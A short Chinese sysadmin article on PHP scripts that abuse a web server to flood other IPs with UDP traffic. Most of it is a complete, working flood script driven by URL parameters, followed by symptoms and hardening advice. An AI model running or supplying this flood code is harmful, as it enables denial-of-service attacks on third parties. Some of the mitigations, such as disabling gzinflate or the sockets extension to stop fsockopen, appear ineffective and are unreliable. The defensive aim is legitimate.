用PHP代碼調用sockets,直接用服務器的網絡攻擊別的IP,常見代碼如下:
復制代碼 代碼如下:
$packets = 0;
$ip = $_GET[\'ip\'];
$rand = $_GET[\'port\'];
set_time_limit(0);
ignore_user_abort(FALSE);
$exec_time = $_GET[\'time\'];
$time = time();
print \"Flooded: $ip on port $rand
\";
$max_time = $time+$exec_time;
for($i=0;$i<65535;$i++){
$out .= \"X\";
}
while(1){
$packets++;
if(time() > $max_time){
break;
}
$fp = fsockopen(\"udp://$ip\", $rand, $errno, $errstr, 5);
if($fp){
fwrite($fp, $out);
fclose($fp);
}
}
echo \"Packet complete at \".time(\'h:i:s\').\" with $packets (\" . round(($packets*65)/1024, 2) . \" mB) packets averaging \". round($packets/$exec_time, 2) . \" packets/s \\n\";
?>
表現特征:
一打開IIS,服務器的流出帶寬就用光-----就是說服務器不斷向別人發包,這個情況和受到DDOS攻擊是不同的,DDOS是不斷收到大量數據包.
解決辦法:
禁止上述的代碼:
在c:\windows\php.ini裡設置:
disable_functions =gzinflate;
在c:\windows\php.ini裡設其值為Off
allow_url_fopen = Off
並且:
;extension=php_sockets.dll
前面的;號一定要有,意思就是限制用sockets.dll
前面的;號要保留
然後重啟IIS
如果上述方式仍然無效,你可以在IIS中,允許的擴展中,禁止PHP的擴展測試.
另外,對於沒加密的php攻擊代碼,還可以用以下辦法處理:
1.在IP策略,或防火牆中,禁止所有udp向外發送
2.用一流信息監控,在SQL攔截及網址攔截中,攔截port=這個關鍵詞